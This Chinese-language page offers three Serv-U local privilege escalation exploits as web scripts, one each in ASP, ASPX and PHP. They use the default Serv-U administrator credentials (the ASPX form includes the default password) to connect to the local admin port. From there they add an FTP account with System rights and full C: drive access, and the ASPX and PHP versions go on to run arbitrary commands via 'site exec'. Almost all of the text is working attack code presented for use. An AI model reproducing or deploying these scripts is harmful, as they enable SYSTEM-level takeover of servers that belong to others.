aspx转发php_serv-u利用脚本(asp/aspx/php)

下面代码保存为servu.asp即可,利用了xml组件，建立一个lake 密码为admin123的可执行ftp帐号

Serv-U 2 admin by lake2

body,td,th {color: #0000FF;font-family: Verdana, Arial, Helvetica, sans-serif;}

body {background-color: #ffffff;font-size:14px; }

a:link {color: #0000FF;text-decoration: none;}

a:visited {text-decoration: none;color: #0000FF;}

a:hover {text-decoration: none;color: #FF0000;}

a:active {text-decoration: none;color: #FF0000;}

.buttom {color: #FFFFFF; border: 1px solid #084B8E; background-color: #719BC5}

.TextBox {border: 1px solid #084B8E}

Serv-U Local Get SYSTEM Shell with ASP

Author: lake2, " target=_blank>[url]http://lake2.0x54.org

[/url]

user:

pwd :

port:

Add User

Del User

Usr = request.Form("duser")

pwd = request.Form("dpwd")

port = request.Form("dport")

'Command = request.Form("dcmd")

if request.Form("radiobutton") = "add" Then

lake2 = "User " & Usr & vbcrlf

lake2 = lake2 & "Pass " & pwd & vbcrlf

lake2 = lake2 & "SITE MAINTENANCE" & vbcrlf

'lake2 = lake2 & "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf

lake2 = lake2 & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=21" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _

"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _

"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _

"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _

"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _

"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _

"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf

'lake2 = lake2 & "quit" & vbcrlf

'--------

'On Error Resume Next

Set xPost = CreateObject("MSXML2.XMLHTTP")

xPost.Open "POST", "[url]http://127.0.0.1:[/url]"& port &"/lake2", True

xPost.Send(lake2)

Set xPOST=nothing

response.write "FTP user lake pass admin123 :)
"

else

lake2 = "User " & Usr & vbcrlf

lake2 = lake2 & "Pass " & pwd & vbcrlf

lake2 = lake2 & "SITE MAINTENANCE" & vbcrlf

lake2 = lake2 & "-DELETEUSER" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=21" & vbcrlf & " User=lake" & vbcrlf

Set xPost3 = CreateObject("MSXML2.XMLHTTP")

xPost3.Open "POST", "[url]http://127.0.0.1:[/url]"& port &"/lake2", True

xPost3.Send(lake2)

Set xPOST3=nothing

response.write "Done!
"

end if

%>

Only for Enjoy&Challenge

!

下面保存为servu.aspx，利用servu的本地溢出执行命令

'

' Love, Where are you ?

Sub BTN_Start_Click(sender As Object, e As EventArgs)

Dim Usr As String = Text_Name.Text

Dim pwd As String = Text_PWD.Text

Dim Port As Int32 = Text_Port.Text

Dim Command As String = Text_cmd.Text

Dim LoginUser As String = "User " & Usr & vbcrlf

Dim LoginPass As String = "Pass " & pwd & vbcrlf

Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf

Dim DelDomain As String = "-DELETEDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf

Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _

"-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _

"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _

"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _

"-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _

"-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _

"-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf

Dim Quit As String = "QUIT" & vbcrlf

Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf

'Dim client As New TcpClient

Dim tcpClient As New TcpClient()

Try

tcpClient.Connect("127.0.0.1", port)

Catch eee As Exception

response.write(eee.ToString())

response.end

End Try

tcpClient.ReceiveBufferSize = 1024

Dim networkStream As NetworkStream = tcpClient.GetStream()

Rec(networkStream)

Send(networkStream, LoginUser)

Rec(networkStream)

Send(networkStream, LoginPass)

Rec(networkStream)

Send(networkStream, MAINTENANCE)

Rec(networkStream)

Send(networkStream, DelDomain)

Rec(networkStream)

Send(networkStream, NewDomain)

Rec(networkStream)

Send(networkStream, NewUser)

Rec(networkStream)

Dim tcpClient2 As New TcpClient()

Try

tcpClient2.Connect("127.0.0.1", 43859)

Catch eee As Exception

response.write(eee.ToString())

response.end

End Try

tcpClient2.ReceiveBufferSize = 1024

Dim networkStream2 As NetworkStream = tcpClient2.GetStream()

Rec(networkStream2)

Send(networkStream2, "User lake" & vbcrlf)

Rec(networkStream2)

Send(networkStream2, "pass admin123" & vbcrlf)

Rec(networkStream2)

Send(networkStream2, "site exec " & Command & vbcrlf)

Rec(networkStream2)

tcpClient2.Close()

Send(networkStream, DelDomain)

Rec(networkStream)

Send(networkStream, Quit)

Rec(networkStream)

tcpClient.Close()

End Sub

Sub Rec(o As Object)

If o.CanRead Then

Dim bytes(1024) As Byte

o.Read(bytes, 0, 1024)

Dim returndata As String = Encoding.ASCII.GetString(bytes)

response.Write("out:" & returndata & "
")

Else

response.Write("What's wrong ?")

End If

End Sub

Sub Send(o As Object,data As String)

If o.CanWrite Then

Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data)

o.Write(sendBytes, 0, sendBytes.Length)

response.write("in: " & data & "
")

Else

response.Write("What's wrong ?")

End If

End Sub

from Serv-U 2

admin by lake2

Name

LocalAdministrator

PWD

#l@$ak#.lk;0@P

Port

43958

cmd

---

下面保存为servu.php，是php版的servu本地溢出程序，可以执行命令。

if(isset($_POST["Port"])&&isset($_POST["User"])&&isset($_POST["Pass"]))

{

$sendbuf = "";

$recvbuf = "";

$domain = "-SETDOMAIN\r\n".

"-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n".

"-TZOEnable=0\r\n".

" TZOKey=\r\n";

$adduser = "-SETUSERSETUP\r\n".

"-IP=0.0.0.0\r\n".

"-PortNo=2121\r\n".

"-User=Will_Be\r\n".

"-Password=Will_Be\r\n".

"-HomeDir=c:\\\r\n".

"-LoginMesFile=\r\n".

"-Disable=0\r\n".

"-RelPaths=1\r\n".

"-NeedSecure=0\r\n".

"-HideHidden=0\r\n".

"-AlwaysAllowLogin=0\r\n".

"-ChangePassword=0\r\n".

"-QuotaEnable=0\r\n".

"-MaxUsersLoginPerIP=-1\r\n".

"-SpeedLimitUp=0\r\n".

"-SpeedLimitDown=0\r\n".

"-MaxNrUsers=-1\r\n".

"-IdleTimeOut=600\r\n".

"-SessionTimeOut=-1\r\n".

"-Expire=0\r\n".

"-RatioUp=1\r\n".

"-RatioDown=1\r\n".

"-RatiosCredit=0\r\n".

"-QuotaCurrent=0\r\n".

"-QuotaMaximum=0\r\n".

"-Maintenance=None\r\n".

"-PasswordType=Regular\r\n".

"-Ratios=None\r\n".

" Access=c:\\|RELP\r\n";

$deldomain="-DELETEDOMAIN\r\n".

"-IP=0.0.0.0\r\n".

" PortNo=2121\r\n";

$sock = fsockopen("127.0.0.1", $_POST["Port"], &$errno, &$errstr, 10);

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "USER ".$_POST["User"]."\r\n";

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "PASS ".$_POST["Pass"]."\r\n";

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "SITE MAINTENANCE\r\n";

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = $domain;

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

$sendbuf = $adduser;

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

echo "**********************************************************
";

echo "Starting Exploit ...
";

echo "**********************************************************
";

$exp = fsockopen("127.0.0.1", "2121", &$errno, &$errstr, 10);

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "USER Will_Be\r\n";

fputs($exp, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "PASS Will_Be\r\n";

fputs($exp, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

$sendbuf = "site exec ".$_POST["Command"]."\r\n";

fputs($exp, $sendbuf, strlen($sendbuf));

echo "Send: site exec ".$_POST["Command"]."
";

$recvbuf = fgets($exp, 1024);

echo "Recv: $recvbuf
";

echo "**********************************************************
";

echo "Starting Delete Domain ...
";

echo "**********************************************************
";

$sendbuf = $deldomain;

fputs($sock, $sendbuf, strlen($sendbuf));

echo "Send: $sendbuf
";

$recvbuf = fgets($sock, 1024);

echo "Recv: $recvbuf
";

fclose($sock);

fclose($exp);

}

?>

Serv-U Local Exploit By Will_Be

LocalPort:

LocalUser:

LocalPass:

Command　: